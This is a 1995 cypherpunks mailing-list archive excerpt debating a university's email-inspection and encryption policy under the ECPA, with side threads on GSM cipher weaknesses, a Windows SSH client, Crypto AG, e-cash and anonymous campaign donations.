email) without escrow is prohibited. Maybe the story is not quite straight
but federal law supposedly protects personal electronic communication and
I somehow don't think OU can override this simply because it passes thru
their computers. 

Sounds like another job for PGP.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew C Bulhak <acb@cs.monash.edu.au>
Date: Sat, 16 Dec 1995 17:14:22 +0800
To: flat-earth@zikzak.net
Subject: Re: QUERY: e-politics mailing list
In-Reply-To: <v01530505acf60e2e11c6@[192.0.2.1]>
Message-ID: <199512160844.TAA07942@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


[Giles Bowkett]
> 
> Does anyone know of a mailing list organized around political issues
> regarding electronic networks, virtual community, the changing roles of
> the city and the corporation, and especially issues of class in a "wired"
> world?
> 
> Much thanx, pls pardon the spam.
> 
> PS - be careful about replying to all recipients - this message went to a
> couple different lists.

If there are issues which specifically concern you (as I assume
there are), why not start your own list?  Does ripco have a list server?
If so, ask the admin to set up a list for you.


-- 
acb@cs.monash.edu.au           If you call this a signature, you oppose its
acb@dev.null.org               reality.  If you do not call it a signature,
http://www.zikzak.net/~acb     you ignore the fact. Now what do you wish to 
Disclaimer: Or something...    call it?	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 17 Dec 1995 10:01:28 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
Message-ID: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 16, 1995 18:37:05, 'Jay Holovacs <holovacs@styx.ios.com>' wrote: 
 
 
>I was told today that students at Oklahoma University have their computer 
>accounts subject to administrative inspection and that encryption (even 
>email) without escrow is prohibited. Maybe the story is not quite straight 
>but federal law supposedly protects personal electronic communication and 
>I somehow don't think OU can override this simply because it passes thru 
>their computers.  
> 
 
First, it may not be true. 
 
Second, if it is true, people frequently define the ability to do something
as a "privilege" not a "right." As in a hypothetical "Use of student
accounts at O.U. is a privilege extended to the students by the University.
By using our computer you keep to our rules, including abandoning any
notion you might have that your communications are in any way private" etc.
etc. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 17 Dec 1995 04:29:28 +0800
To: pcw@access.digex.net
Subject: Re: Balto Sun Followup: Crypto AG a friend of Cypherpunks?
In-Reply-To: <v02130501acf7db56f315@[199.125.128.5]>
Message-ID: <m0tR2Mf-0002e8C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Peter" == Peter Wayner <pcw@access.digex.net> writes:

    Peter> My favorite detail, however, was the hint that the rumors
    Peter> are a "well conceived ploy" to harrass a company that is
    Peter> making strong crypto for independent countries. So maybe
    Peter> they're cypherpunks?

Nope. They're owned by the Federal Republic of Germany. They deliver
all cryptographic equipment for all TLAs in Germany. They're about as
much cypherpunks as the NSA is.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMNMfGEyjTSyISdw9AQHr9QP7Bojhmn/xsG92xZh9KWM6Dilon56M8oF4
roIe27SwF+Fmj8G72bK7TcgIPizpvhraT5O4/270pEvkbakYeAADbA5+K5cf3XbC
TLvZkqBtBHwJx56nyExfJdKDPD3cQlxymg2oj+8DzCq8f9Z4yUZrumvNjeAIlIks
bmJJ/11y1wU=
=1xSy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Dec 1995 17:51:04 +0800
To: cypherpunks@toad.com
Subject: (fwd) Showdown over e-cash
Message-ID: <v02120d01acf92915736e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: dmk@zp.tempo.att.com
Mime-Version: 1.0
Date: Sat, 16 Dec 1995 20:27:29 -0500
To: www-buyinfo@allegra.att.com
From: allegra!dmk@uunet.uu.net (Dave Kristol)
Subject: Showdown over e-cash

Take a look at the article by that title at
        http://www.upside.com/resource/print/9601/ecash.html
It's a provocative and rather breathless account of the forthcoming demise
of banks as we know them, brought on by electronic transactions.

Dave Kristol
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 17 Dec 1995 12:40:44 +0800
To: tallpaul <tallpaul@pipeline.com>
Subject: Re: Is ths legal?...
In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951216220159.26525A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 16 Dec 1995, tallpaul wrote:

> Second, if it is true, people frequently define the ability to do something
> as a "privilege" not a "right." As in a hypothetical "Use of student
> accounts at O.U. is a privilege extended to the students by the University.
> By using our computer you keep to our rules, including abandoning any
> notion you might have that your communications are in any way private" etc.
> etc. 

I believe there is a supreme court case that essentially says that a 
public entity cannot define something as either privilege or right.  I'm 
not sure the name, but the EFF has an abstract available.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+
GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd
ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD
gQR8KyPuSrw=
=Wagv
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Sun, 17 Dec 1995 07:15:54 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <Pine.SOL.3.91.951217003923.29839A-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



What about cellular phones, especially GSM? As I have heard GSM is 
supposed to be secure, at least that's what the salespersons tell every 
time they are selling a GSM.

I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I 
know nothing more about them.

Jüri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 17 Dec 1995 19:25:19 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Encrypted telnet...
In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com>
Message-ID: <199512170136.DAA02488@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> I am looking for an encrypted telnet (or rlogin/etc) package
> that supports a Windoze client.  
> 
> It looks like all the normal ones that I can find 
> (SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
> Don't get me wrong - I would prefer to use Unix, but I am
> headed off to locations, where I know all I'll have access to 
> is Windows, with a PPP stack to some ISP.

A preliminary windows client for SSH was recently announced by Cedomir
Igaly <cigaly@srce.hr>.  I am also working on a windows client myself,
and expect early beta versions to be available in early January, and
an official version in late February.

[For more information on ssh, see http://www.cs.hut.fi/ssh.]

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 03:56:02 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
Message-ID: <wkoy1Sq00YUvMl2sVN@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 16-Dec-95 Re: Is ths legal?... by
tallpaul@pipeline.com 
> Second, if it is true, people frequently define the ability to do something
> as a "privilege" not a "right." As in a hypothetical "Use of student
> accounts at O.U. is a privilege extended to the students by the University.
> By using our computer you keep to our rules, including abandoning any
> notion you might have that your communications are in any way private" etc.
> etc. 

Exactly. If Oklahoma University is private, it can establish and enforce
policies that would be unconstitutional at public schools. Those
policies become part of the contract and a student must abide by them,
except when they are administered arbitrarily and capriciously. At a
public university, students probably would have more freedom to
challenge this policy.

A recent article from the school's student newspaper says:

"In the third part, the policy states that the university reserves the
right of access to user e-mail... Personal passwords may not be used to
prevent access. In the fourth part, the policy states that e-mail is
neither private nor confidential. The fifth part states important
documents should be saved in the computer or converted to hard copy."
(http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html)

To me, "personal passwords" sounds like a student newspaper trying to
say "encryption."

I've copied this message to a grad student privacy advocate quoted in
the article and to the student newspaper. Perhaps they can shed more
light on the situation.

The best way to work against totalitarian administrators is to shine a
bright light on their repressive policies.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Sun, 17 Dec 1995 18:37:47 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512170428.PAA22362@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951217051339.43966A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Jiri Baum wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> There's no automatic rm that will also delete all backups of the file.
> (You are keeping backups, aren't you?)
> 

In this particular case what I'm concerned about is a temporary cleartext 
copy of a permanently encrypted document.  The cleartext only exists for 
about 1-4 seconds, and then is deleted, so backups aren't really a 
problem.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 03:54:49 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.ULT.3.91.951216220159.26525A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.951217055442.19904B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Dec 1995, Robert A. Hayden wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 16 Dec 1995, tallpaul wrote:
> 
> > Second, if it is true, people frequently define the ability to do something
> > as a "privilege" not a "right." As in a hypothetical "Use of student
> > accounts at O.U. is a privilege extended to the students by the University.
> > By using our computer you keep to our rules, including abandoning any
> > notion you might have that your communications are in any way private" etc.
> > etc. 
> 
> I believe there is a supreme court case that essentially says that a 
> public entity cannot define something as either privilege or right. 

I this ruling would prevent the Supreme Court from defining 
something as a privilege or right.

It would also pose this limitation on states, as they are public 
entities, and thus driver's licenses cannot be defined as one or the 
other, which as we all very well know, they are.
> I'm not sure the name, but the EFF has an abstract available.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: PGP Signed with PineSign 2.2
> 
> iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+
> GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd
> ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD
> gQR8KyPuSrw=
> =Wagv
> -----END PGP SIGNATURE-----
>  
> ____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
> \  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
>  \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
>    \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html
> 
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
> K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
> R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
> ------END GEEK CODE BLOCK------
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 23:18:24 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?... (fwd)
Message-ID: <Pine.3.89.9512170951.A5895-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> Exactly. If Oklahoma University is private, it can establish and enforce
> policies that would be unconstitutional at public schools. Those 
> policies become part of the contract and a student must abide by them, 
> except when they are administered arbitrarily and capriciously. At a
> public university, students probably would have more freedom to 
> challenge this policy.  

Think about this principle in light of the current political climate
toward "privatization." Moves to privatize schools, prisons, even police
forces in a few communities. Sounds like a good way around all those
<pesky> constitutional protections. 

> A recent article from the school's student newspaper says:
> 
> "In the third part, the policy states that the university reserves the
> right of access to user e-mail... 

It seems to me that there is some legal status to email established by 
Congress in the late '80s, especially that which comes in from outside 
with 'some expectation' of privacy. I've got to rummage around for the 
details however.

 Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 23:22:38 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?.. (fwd)
Message-ID: <Pine.3.89.9512170924.A5895-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain




This is the reference I couldn't find for my previous post. It would seem 
to have some relevance here

 Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
et seq.).  "It shall not be unlawful under this chapter for an operator of
a switchboard, or an officer, employee, or agent of a provider of wire *or
electronic* communication service, whose facilities are used in the trans-
mission of a wire communication, to intercept, disclose, or use that
communication in the normal course of his employment while engaged in any
activity which is a necessary incident to the rendition of his service or
to the protection of the rights or property of the provider of that
service, except that a provider of wire communication service to the
public shall not utilize service observing or random monitoring except for
mechanical or service quality control checks."  18 USC section
2510(2)(a)(i). 

Doesn't seem to leave much room for snooping on contents of messages. 


Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Dec 1995 23:50:30 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.3.89.9512170924.A5895-0100000@styx.ios.com>
Message-ID: <Pine.SUN.3.91.951217101355.22454C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Jay Holovacs wrote:

> 
> 
> This is the reference I couldn't find for my previous post. It would seem 
> to have some relevance here
> 
>  Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
> et seq.).  "It shall not be unlawful under this chapter for an operator of
> a switchboard, or an officer, employee, or agent of a provider of wire *or
> electronic* communication service, whose facilities are used in the trans-
> mission of a wire communication, to intercept, disclose, or use that
> communication in the normal course of his employment while engaged in any
> activity which is a necessary incident to the rendition of his service or
> to the protection of the rights or property of the provider of that
> service, except that a provider of wire communication service to the
> public shall not utilize service observing or random monitoring except for
> mechanical or service quality control checks."  18 USC section
> 2510(2)(a)(i). 
> 
> Doesn't seem to leave much room for snooping on contents of messages. 

I disagree.  Instead it implies that interception and administrative 
review of content will be tolerated where it is "a necessary incident to 
the rendition of his service or to the protection of the rights or 
property of the provider of that service."  Note that it will be the 
provider who makes the definition in the ex ante application.

Even worse, the protection that is given is for "a provider of wire 
communication service to the public."

I would be very surprised if, 1> "provider" was anything but a narrowly 
drawn definition, 2> provider to the public is not specifically narrowed 
as well.

> Jay Holovacs <holovacs@ios.com>
> PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
>  (KEY id 1024/80E4AA05) email me for key
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Mon, 18 Dec 1995 00:02:45 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.SUN.3.91.951217101355.22454C-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9512171010.A7388-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 17 Dec 1995, Black Unicorn wrote:
> 
> I disagree.  Instead it implies that interception and administrative 
> review of content will be tolerated where it is "a necessary incident to 
> the rendition of his service or to the protection of the rights or 
> property of the provider of that service."  Note that it will be the 
> provider who makes the definition in the ex ante application.
> 
The provider is allowed access ONLY for QC purposes. Getting back to the 
original point, the provider's ability to interpret the contents of the 
message is in no way required to monitor the system and cannot be used as 
a justification in itself for prohibiting use of crypto. 

Also, what if someone outside the system emails encrypted messages to the 
user. What authority would the sys admin have there??

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 03:55:57 +0800
To: cypherpunks@toad.com
Subject: Political Cleanup program
Message-ID: <m0tROOn-0008yHC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Politics is traditionally corrupt, it appears, because donors to politicians
and political campaigns expect a quid pro quo for their donations.  Various
unsatisfactory solutions include campaign spending limits, etc.

It occurs to me that it would be a major advance if a system could be set up
that would "blind" campaign donations as to their source:  The donor could
be satisfied that his donation gets to the candidate or cause, but the
candidate couldn't know  who actually paid the money (and the donor would be
unable to prove that he made a donation, for example).  Admittedly there are
a lot of details that need to be worked out, but if this could be
accomplished it would change politics as we know it.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 05:04:25 +0800
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <2.2b7.32.19951217203129.0089fe34@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/17/95 -0800, you wrote:

>It occurs to me that it would be a major advance if a system could be set up
>that would "blind" campaign donations as to their source:  The donor could
>be satisfied that his donation gets to the candidate or cause, but the
>candidate couldn't know  who actually paid the money (and the donor would be
>unable to prove that he made a donation, for example).  Admittedly there are
>a lot of details that need to be worked out, but if this could be
>accomplished it would change politics as we know it.

I think you would see a lot less donations by the corporate powers that be
and the favormongers.  (Which is why such a system will probably never come
into existence.)  It would be a good step in the right direction.

However...
I live in a state which just enacted a series of campaign reforms.  The
first thing the lobbyists did was find a way to exploit every loophole
possible to get around that legislation.  Such a system would have to be
pretty tight and pretty specific.  (And therefore will be fought against by
almost every politician and lobbyist on the planet.)  The fundraising
dinners will certainly have to go...

 

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Dec 1995 02:12:24 +0800
To: cypherpunks@toad.com
Subject: Re: BosniaLINK
In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl>
Message-ID: <199512171747.MAA06815@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



What I want to know is this: why the hell do you think this is
interesting to cypherpunks, and why do people like you continue to
post random URLs, news stories, etc, that have nothing to do with
cryptography, privacy, or anything else remotely discussed on this
mailing list, even though lots of people repeatedly state that it
isn't desired? Are you an NSA operative attempting to reduce our
effectiveness, or just from a drug company hoping to raise our blood
pressure?

.pm

Anonymous writes:
> 
> URL: http://www.dtic.dla.mil/bosnia/
> 
>    BosniaLINK Banner
>    
>    Welcome to BosniaLINK, the official Department of Defense information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 06:02:13 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
Message-ID: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 AM 12/17/95 -0500, you wrote:

>Exactly. If Oklahoma University is private, it can establish and enforce
>policies that would be unconstitutional at public schools. Those
>policies become part of the contract and a student must abide by them,
>except when they are administered arbitrarily and capriciously. At a
>public universities, students probably would have more freedom to
>challenge this policy.

In looking at their homepage, it appears to be a state funded school.
(There is not a lot of background on the school history or affiliations on
their homepage except for a note that it was founded by the territorial
legislature a number of years before becoming a state..)

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Mon, 18 Dec 1995 14:35:04 +0800
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <199512171141.NAA02997@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> What about cellular phones, especially GSM? As I have heard GSM is 
> supposed to be secure, at least that's what the salespersons tell every 
> time they are selling a GSM.
> 
> I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I 
> know nothing more about them.

I got the following from mjos@math.jyu.fi a couple of months ago.
Unfortunately I was unable to attend or listen on mbone.  Does anyone
know more about this?

>                  University of Cambridge Computer Laboratory
>
>                                SEMINAR SERIES
>
>
> 10th October    Bill Chambers, King's College, London
>                PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK
>                CONTROL
>
> ..

> GSM:n salausalgoritmi on juuri tuota tyyppiä. Chambers yritti pitää tuota
> nimenomaista esitelmää jo yli vuosi sitten, mutta silloin viralliset tahot
> puuttuivat asiaan ja esitys peruttiin. Hän on löytänyt algoritmista aukkoja,
> joiden avulla purkuaika saadaan erittäin lyhyeksi.
> 
> ps. ne meistä, jotka pääsevät mboneen käsiksi, voivat seurata tapahtumia
>     livenä  :)

[Free translation: The GSM encryption algorithm is of exactly that
type.  Chambers tried to have this particular presentation over a
year ago, but at that time the official side interfered and the
presentation was cancelled.  He has found holes in the algorithm that
can be used to make decryption (without key) very quick.

PS.  Those of us who can get access to mbone, can follow it live.]

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 18 Dec 1995 10:34:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tROOn-0008yHC@pacifier.com>
Message-ID: <199512172204.OAA22202@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JB:
>Politics is traditionally corrupt, it appears, because donors to politicians
>and political campaigns expect a quid pro quo for their donations.  Various
>unsatisfactory solutions include campaign spending limits, etc.

I have an unusual view that I've never seen elsewhere: the problem with
our government is not that money or PACs are involved, but that the system
does not handle or resolve the conflicts between them very well. in other
words, in contrary to the current view that all PACs are evil, I think the
problem is not that we have PACs, but that our current system does not
balance their demands in some sensible manner.  the system is
susceptible to corruption. it is conceivable however that there would be
a system that involves money and politics but still avoids corruption.

there seem to be a lot of people who suggest that merely because politics
involves money, it is therefore corrupt. this is an awfully vague and
nebulous line of thinking in my view. are we to suppose that any industry
that involves money (all of them, of course) inevitably moves in 
the direction of corruption? perhaps some more "cynicalpunks" may have 
this view, but I don't share it.

>It occurs to me that it would be a major advance if a system could be set up
>that would "blind" campaign donations as to their source:  The donor could
>be satisfied that his donation gets to the candidate or cause, but the
>candidate couldn't know  who actually paid the money (and the donor would be
>unable to prove that he made a donation, for example).  Admittedly there are
>a lot of details that need to be worked out, but if this could be
>accomplished it would change politics as we know it.

what you describe would allow anonymous bribes. the giver could always identify
his cash donation "out of band" to the receiver. moreover, other observers
would not be aware of the relationship. why do you think this would
be an improvement? to the contrary our current system works hard to require
the disclosure of who donated what to a candidate, so the candidate's potential
hidden agendas and ulterior motives can be revealed. seems reasonable to 
me.

you are probably barking up the wrong tree here on cypherpunks, however,
because most of the key "insiders" here are convinced that democracy is
a proven failure, and that in fact government is invariably corrupt and
oppressive, no matter what the implementation. the "solutions" advocated
here are chiefly withdrawal and subterfuge.

needless to say I disagree with this. I wonder if some day someone will
invent a "killer app" that doubles as a political governing system.
it seems to me politics is one of the last most intractable areas of
human interaction when many others have been harmonized and systematized
by the information revolution. I suspect it will eventually succumb to
technological ingenuity as well. the end result would be a government
that is not perfect, but is at least as good as the population that
drives it, and no worse. (in contrast today we seem to have a government
that is no better than the least common denominator).


JB, I have to wonder however how your ideas about campaign reform tie into 
your prior advocation of political assassinations as a legitimate form of
citizen power.  have you given up on the idea of murdering politicians as
a means of political reform? or are you now just coupling that idea with
campaign reform to put some new bells and whistles on 
your overall ideological package?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 17 Dec 1995 23:59:20 +0800
To: cypherpunks@toad.com
Subject: BosniaLINK
Message-ID: <199512171340.OAA14680@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.dtic.dla.mil/bosnia/

   BosniaLINK Banner
   
   Welcome to BosniaLINK, the official Department of Defense information
   system about U.S. military activities in Operation JOINT ENDEAVOR, the
   NATO peacekeeping mission in Bosnia. This system is provided by the
   Office of the Assistant to the Secretary of Defense for Public
   Affairs. All information in BosniaLINK is publicly released
   information from the U.S. government or NATO headquarters.

   BosniaLINK contains operation maps, fact sheets, news releases,
   biographies of key commanders and leaders, and transcripts of
   briefings, speeches and testimony. It is also hyperlinked to the NATO
   and State Department information services.

   _________________________________________________________________

   Contents

     * Maps (Dec 8)
     * Fact Sheets (Dec 12)
     * News Releases (Dec 15)
     * Photos (Dec 15)
     * Biographies of Key Commanders and Leaders (Dec 15)
     * Transcripts of Briefings (Dec 15)
     * Speeches and Testimony (Dec 15)

   _________________________________________________________________

   RELATED SITES FOR BOSNIA INFORMATION

   Air Force Role in Bosnia
   NATO
   U.S. State Department: U.S. Policy on Bosnia
   Navy News Service: Bosnia Operations

   _________________________________________________________________

   BosniaLINK is provided through the cooperative efforts of the Office
   of The Assistant to the Secretary of Defense (Public Affairs), and the
   Defense Technical Information Center. This is a government computer
   system.

   _________________________________________________________________

   DefenseLINK Home






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 04:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.3.89.9512171444.F10678-0100000@world.std.com>
Message-ID: <skp7EKS00YUvAEUFUm@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Disclaimer: I'm not a lawyer. Harvey is. (And a pretty damn good one, too.)

-Declan

---------- Forwarded message begins here ----------

Date: Sun, 17 Dec 1995 14:38:24 +0001 (EST)
